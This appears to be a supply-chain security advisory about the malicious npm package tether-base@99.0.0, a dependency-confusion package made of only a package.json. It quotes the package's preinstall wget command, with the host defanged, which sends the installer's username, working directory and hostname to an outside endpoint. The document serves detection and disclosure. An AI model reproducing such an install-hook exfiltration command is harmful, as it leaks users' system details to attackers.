LWA-2026-5276 confirmed malware

tether-base@99.0.0

Malicious code in tether-base (npm)

T1195.002 · Compromise Software Supply ChainT1059.004 · Unix ShellT1082 · System Information DiscoveryT1041 · Exfiltration Over C2 ChannelT1071.001 · Web Protocols

Analysis

tether-base@99.0.0 is a dependency-confusion package that contains no functional code — the tarball is a single package.json file. On npm install, the preinstall script runs: wget --quiet "hxxp://cuwihexxxizbqmurenibmncf9zuih6fby[.]oast[.]fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)". This exfiltrates the installer's username, current working directory, and hostname to an oast[.]fun C2 endpoint via HTTP GET. The package was published at version 99.0.0 with a throwaway publisher identity and no repository, README, or source code, making it a classic dependency-confusion supply-chain attack that should be treated as malicious.

analyzed by
Leitwacht
first seen
Jun 14, 2026, 10:33 PM
analyzed
Jun 14, 2026, 10:34 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.